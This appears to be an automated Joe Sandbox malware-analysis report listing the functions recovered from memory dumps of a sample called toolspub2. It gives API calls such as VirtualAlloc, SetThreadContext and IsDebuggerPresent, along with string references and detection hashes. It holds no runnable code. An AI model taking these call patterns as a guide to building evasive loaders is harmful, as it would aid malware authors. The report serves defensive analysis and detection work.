CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00830533

Strings

mfoaskdfnoa, xrefs: 00830520, 00830523
0, xrefs: 00830492
saodkfnosa9uin, xrefs: 008304DA
d, xrefs: 00830584

Memory Dump Source

Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: c5bd65945d3bdff80a01f67cdecd1a2a4b8577322f02324cee46c1001b27c816
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 72511870D083C8DAEB11CBE8C859BDDBFB2AF51708F144058D5447F286C3BA5A58CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC48 Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00408650), ref: 0040CC4B
__malloc_crt.LIBCMT ref: 0040CC7A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040CC87

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 3e204571bdbb0458f023648185286c56f3d3937ffe736747ee8f9931af26ec88
Instruction ID: 050faceb3d5b3391a9c0513903d2e7c15e72734720457198117a3b5261d180e3
Opcode Fuzzy Hash: 3e204571bdbb0458f023648185286c56f3d3937ffe736747ee8f9931af26ec88
Instruction Fuzzy Hash: 27F0E977508110DAEA307B34FDC9C975228CAD231430A463BF449E3290F6388D8182A9

Uniqueness

Uniqueness Score: -1.00%

Function 008305B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 008305EC

Strings

o, xrefs: 00830600
apfHQ, xrefs: 008305E2, 008305E5

Memory Dump Source

Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: cfc67f789f4ca95c6ec559d63a83865c37f71a00fd29e8746d2f884d9c1e5a49
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 03011E70C0424CEADB14DBD8C5193AEBFB5AF91309F148499C4096B242D7B69B58CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00411A54 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040A6C2,00000000,?,00000000,00000000,00000000,?,0040C1B2,00000001,00000214), ref: 00411A97

Part of subcall function 0040A8EF: __getptd_noexit.LIBCMT ref: 0040A8EF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 7631eb4d99a9ac7973f15a4bec861ca08531e038e7d5a0e1ffea8794d642c478
Instruction ID: be9b047a429eaf5cad6436437b1c02e6f641f4c633c8649e7acb7c0fdf8b2f54
Opcode Fuzzy Hash: 7631eb4d99a9ac7973f15a4bec861ca08531e038e7d5a0e1ffea8794d642c478
Instruction Fuzzy Hash: 8F01B1713066159AEB259F25DC44BE73B94EF813A1F04852BEA19CA2F0D77898908698

Uniqueness

Uniqueness Score: -1.00%

Function 009580C3 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00958114

Memory Dump Source

Source File: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Offset: 00952000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_952000_toolspub2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: caa7e4190025b36cf308abf77fefc191c7c3ecd450a7d42db22581cc64fc7d6d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 29113C79A00208EFDB01DF99C985E99BFF5AF08751F0580A4F948AB362D771EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042A660 Relevance: 56.7, APIs: 3, Strings: 29, Instructions: 715COMMON

Download Yara Rule

APIs

CharUpperW.USER32(00000000,3ADE7A91,698C5357,41D8CE48,25C1687E,418F6582,698C5357,048B4B8D,17C9A0AF,6F52AFFE,22C9DDBD,566AD047,68316C5B,3158AF5F,1CE65E10,25213482), ref: 0042B478

Part of subcall function 00429C40: CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00429C6D
Part of subcall function 00429C40: AddConsoleAliasW.KERNEL32(00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429C7E
Part of subcall function 00429C40: GetAltTabInfoA.USER32(00000000,00000000,00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 00429CBF
Part of subcall function 00429C40: DrawCaption.USER32(00000000,00000000,00000000,00000000), ref: 00429CC9
Part of subcall function 00429C40: WinHttpGetProxyForUrl.WINHTTP(00000000,zitecihucepikigibecit,00000000,684C9EF0,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429CDB
Part of subcall function 00429C40: SetThreadContext.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429CEC
Part of subcall function 00429C40: GetFileAttributesExA.KERNEL32(fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc,00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D00
Part of subcall function 00429C40: DragAcceptFiles.SHELL32(00000000,00000000), ref: 00429D08
Part of subcall function 00429C40: CoGetInstanceFromFile.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,3F7F80AC,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429D1A
Part of subcall function 00429C40: __putw.LIBCMT ref: 00429D32

GetTempPathA.KERNEL32(1FF896F3,?,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80,07780C44,31630C95), ref: 0042B9CB
GetCurrentDirectoryW.KERNEL32(1FF896F3,?,?,00000000), ref: 0042B9D9

Strings

Yx@t, xrefs: 0042B795
\Sj=, xrefs: 0042B12F
O2l[, xrefs: 0042B3DE
+.h, xrefs: 0042AC51
WTE, xrefs: 0042B1DE
sB1s, xrefs: 0042A855
$iEz, xrefs: 0042ADC9
=)W{, xrefs: 0042AD6F
.V , xrefs: 0042AC2C
7(C, xrefs: 0042A8DB
fPT, xrefs: 0042B303
rNr<, xrefs: 0042A7FB
S"Z, xrefs: 0042A797
K"M`, xrefs: 0042A701
ogr(, xrefs: 0042AFE2
`*T, xrefs: 0042B72E
gew, xrefs: 0042AECD
m~W , xrefs: 0042AAAA
u+[, xrefs: 0042A8FD
E!{, xrefs: 0042A73D
hRjT, xrefs: 0042B677
|59M, xrefs: 0042B383
msX?, xrefs: 0042B6A9
o%HQ, xrefs: 0042B004
X!pq, xrefs: 0042AE73
)\2, xrefs: 0042ABE2
c<z, xrefs: 0042B724
[l1h, xrefs: 0042B280
T`"+, xrefs: 0042A8AF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: CharFile$AcceptAliasAttributesBuffCaptionConsoleContextCurrentDirectoryDragDrawFilesFromHttpInfoInstancePathProxyTempThreadUpper__putw
String ID: .V $$iEz$+.h$7(C$=)W{$E!{$K"M`$O2l[$S"Z$T`"+$WTE$X!pq$Yx@t$[l1h$\Sj=$`*T$c<z$fPT$gew$hRjT$msX?$m~W $o%HQ$ogr($rNr<$sB1s$u+[$|59M$)\2
API String ID: 1229265645-4214339544
Opcode ID: 80365f742b4ad3ac1a843e1a0d8e6e951492917d86867d8317433c468aafcb6f
Instruction ID: 2c32f343e4680c3eb39119d33b8846961cdd97289238ff00558c92a9b8afee93
Opcode Fuzzy Hash: 80365f742b4ad3ac1a843e1a0d8e6e951492917d86867d8317433c468aafcb6f
Instruction Fuzzy Hash: F0A2B9B9E012298BCB648FAAD9897CCF7B4BF09314F5085C8E54AAB611D7309EC1CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00429A30 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 137fileCOMMON

Download Yara Rule

APIs

WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429A77
WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429B53
GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429B94
FindNextFileA.KERNEL32(00000000,?), ref: 00429BA1
GetCommandLineA.KERNEL32 ref: 00429BDE
MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429C08

Strings

yinimigibinubase wadulehujelevelikamupoy, xrefs: 00429C13
, xrefs: 00429AAF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: ConsoleFileInputWrite$AtomCommandFindGlobalLineMoveNameNextProgressWith
String ID: $yinimigibinubase wadulehujelevelikamupoy
API String ID: 2196092271-1017807911
Opcode ID: 4571bce14c01ff8bc8952fceb986d2739a3f5cbc1dd65224f54043612bf3d12b
Instruction ID: bb3f097f5042ae0023657aa6e0f55cba338bfdf33f052d5af88b00b71c098cf3
Opcode Fuzzy Hash: 4571bce14c01ff8bc8952fceb986d2739a3f5cbc1dd65224f54043612bf3d12b
Instruction Fuzzy Hash: 495148716083418FD350CF29E944A1AB7F5FBC8704F408A2EF59997360D734A909CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00429A5C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 122fileCOMMON

Download Yara Rule

APIs

WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429A77
WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429B53
GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429B94
FindNextFileA.KERNEL32(00000000,?), ref: 00429BA1
GetCommandLineA.KERNEL32 ref: 00429BDE
MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429C08

Strings

yinimigibinubase wadulehujelevelikamupoy, xrefs: 00429C13
, xrefs: 00429AAF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: ConsoleFileInputWrite$AtomCommandFindGlobalLineMoveNameNextProgressWith
String ID: $yinimigibinubase wadulehujelevelikamupoy
API String ID: 2196092271-1017807911
Opcode ID: 04a7ad8744d7c6bcb5d0807dd582ef58581822fca8244814fa6a41af49e36e83
Instruction ID: ca2d7b81472e58b6c83b046dbca82f6470698ae172e04f4224ebff5586b8a7fd
Opcode Fuzzy Hash: 04a7ad8744d7c6bcb5d0807dd582ef58581822fca8244814fa6a41af49e36e83
Instruction Fuzzy Hash: 0D5127706083428FD350CF29E944A1AB7F5FBC8714F408A2EF59997360D734A909CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00429870 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116fileCOMMON

Download Yara Rule

APIs

WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429953
GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429992
FindNextFileA.KERNEL32(00000000,?), ref: 0042999E
GetCommandLineA.KERNEL32 ref: 004299DB
MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429A03
FindFirstFileW.KERNEL32(yinimigibinubase wadulehujelevelikamupoy,?), ref: 00429A13

Strings

yinimigibinubase wadulehujelevelikamupoy, xrefs: 00429A0E
, xrefs: 004298B7

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: File$Find$AtomCommandConsoleFirstGlobalInputLineMoveNameNextProgressWithWrite
String ID: $yinimigibinubase wadulehujelevelikamupoy
API String ID: 2448517103-1017807911
Opcode ID: 4ee198126cecfd5d18ba3afd991a0483246c6cc7c1d5322ffbae539aef079f95
Instruction ID: fbaa84ce5cce19cbdbca4aad296b96af5743f2ca72eaf92979516103a8ab62fc
Opcode Fuzzy Hash: 4ee198126cecfd5d18ba3afd991a0483246c6cc7c1d5322ffbae539aef079f95
Instruction Fuzzy Hash: E951D5B16083419FC344CF69E88491BB7E5FBC8318F408A2EF59993360D734A949CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00429AB9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429B53
GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429B94
FindNextFileA.KERNEL32(00000000,?), ref: 00429BA1
GetCommandLineA.KERNEL32 ref: 00429BDE
MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429C08
FindFirstFileW.KERNEL32(yinimigibinubase wadulehujelevelikamupoy,?), ref: 00429C18

Strings

yinimigibinubase wadulehujelevelikamupoy, xrefs: 00429C13

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: File$Find$AtomCommandConsoleFirstGlobalInputLineMoveNameNextProgressWithWrite
String ID: yinimigibinubase wadulehujelevelikamupoy
API String ID: 2448517103-3021700487
Opcode ID: 6d1401de17ff3481f19bd6da344e4752a93bce8f54b1c3dd3d257aa0ccc7f856
Instruction ID: c6dc2a73c98c535e9e4092ee17d555c2f8d5d5c81904414914735247335d47df
Opcode Fuzzy Hash: 6d1401de17ff3481f19bd6da344e4752a93bce8f54b1c3dd3d257aa0ccc7f856
Instruction Fuzzy Hash: B84126706083428FD750CF69E844B1AB7E1FFC8714F408A2EF59997290DB74A909CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408F61 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040DB27
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040DB3C
UnhandledExceptionFilter.KERNEL32(HGC), ref: 0040DB47
GetCurrentProcess.KERNEL32(C0000409), ref: 0040DB63
TerminateProcess.KERNEL32(00000000), ref: 0040DB6A

Strings

HGC, xrefs: 0040DB42

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: HGC
API String ID: 2579439406-3508915330
Opcode ID: f4ce03ae630d9c7534803f7b77843c481b2474422cb5c3e1a9256cfbe20abb21
Instruction ID: 62c41ed6742343c38e09831578c6ef5286b6a35ce24509409835bce0994f289b
Opcode Fuzzy Hash: f4ce03ae630d9c7534803f7b77843c481b2474422cb5c3e1a9256cfbe20abb21
Instruction Fuzzy Hash: E621EF789003889FD358EF65F9846843BF4FB88310F61247AE508973A0D7B46985CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040FACC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00410109,?,00409658,?,000000BC,?,00000001,00000000,00000000), ref: 0040FB0B
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00410109,?,00409658,?,000000BC,?,00000001,00000000,00000000), ref: 0040FB34
GetACP.KERNEL32(?,?,00410109,?,00409658,?,000000BC,?,00000001,00000000), ref: 0040FB48

Strings

ACP, xrefs: 0040FADB
OCP, xrefs: 0040FAEC

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: cdb6ad7b1bf60883c83d79ade6cd974f415e109b9f955d88e479cef7e6e52d42
Instruction ID: d23c5ff0868376c525835106792a3a6232b63bf11401bd391cd638001cdf541d
Opcode Fuzzy Hash: cdb6ad7b1bf60883c83d79ade6cd974f415e109b9f955d88e479cef7e6e52d42
Instruction Fuzzy Hash: 7901B130601207BAEB359FA1ED56F9B77BCAB40358F20003AF501F19D0EB78EA459A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7CA Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C788), ref: 0040C7CF

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 769ea726349dfd556cfa14b8e0e40af282eb8453c8e8ec2422ba065d32b712c5
Instruction ID: ae92c47ee9e9c6054a4e6049fc2ad53bf17f23e99eafb1f73ca83a6c854442a5
Opcode Fuzzy Hash: 769ea726349dfd556cfa14b8e0e40af282eb8453c8e8ec2422ba065d32b712c5
Instruction Fuzzy Hash: 2390026039110186C60057F45D8D50526D06A8878679105B57501F50E4DBB44005591E

Uniqueness

Uniqueness Score: -1.00%

Function 00957CE1 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Offset: 00952000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_952000_toolspub2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b8c75de490fbc8f2467d333937bf90f44a850fd06bb80f24a59196211d62056a
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 5B118E72344100AFD754DF96EC91FA6B3EAEF88321B298065ED04CB356E679ED02C760

Uniqueness

Uniqueness Score: -1.00%

Function 00830042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: a1239e4c62c9675da8cde8102ce9091fd36aa3c047204cf6459d8299915e3759
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 801170723405009FD758DE69DCE1FA673EAFB88320B298155E908CB312D675EC01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040C349 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040861B), ref: 0040C351
__mtterm.LIBCMT ref: 0040C35D

Part of subcall function 0040C096: DecodePointer.KERNEL32(00000005,0040C4BF,?,0040861B), ref: 0040C0A7
Part of subcall function 0040C096: TlsFree.KERNEL32(0000000D,0040C4BF,?,0040861B), ref: 0040C0C1

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040C373
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040C380
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040C38D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040C39A
TlsAlloc.KERNEL32(?,0040861B), ref: 0040C3EA
TlsSetValue.KERNEL32(00000000,?,0040861B), ref: 0040C405
__init_pointers.LIBCMT ref: 0040C40F
EncodePointer.KERNEL32(?,0040861B), ref: 0040C420
EncodePointer.KERNEL32(?,0040861B), ref: 0040C42D
EncodePointer.KERNEL32(?,0040861B), ref: 0040C43A
EncodePointer.KERNEL32(?,0040861B), ref: 0040C447
DecodePointer.KERNEL32(0040C21A,?,0040861B), ref: 0040C468
__calloc_crt.LIBCMT ref: 0040C47D
DecodePointer.KERNEL32(00000000,?,0040861B), ref: 0040C497
__initptd.LIBCMT ref: 0040C4A2
GetCurrentThreadId.KERNEL32 ref: 0040C4A9

Strings

PN7w, xrefs: 0040C457
KERNEL32.DLL, xrefs: 0040C34C
FlsSetValue, xrefs: 0040C382
FlsAlloc, xrefs: 0040C36D
FlsGetValue, xrefs: 0040C375
FlsFree, xrefs: 0040C38F

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PN7w
API String ID: 3732613303-4188625860
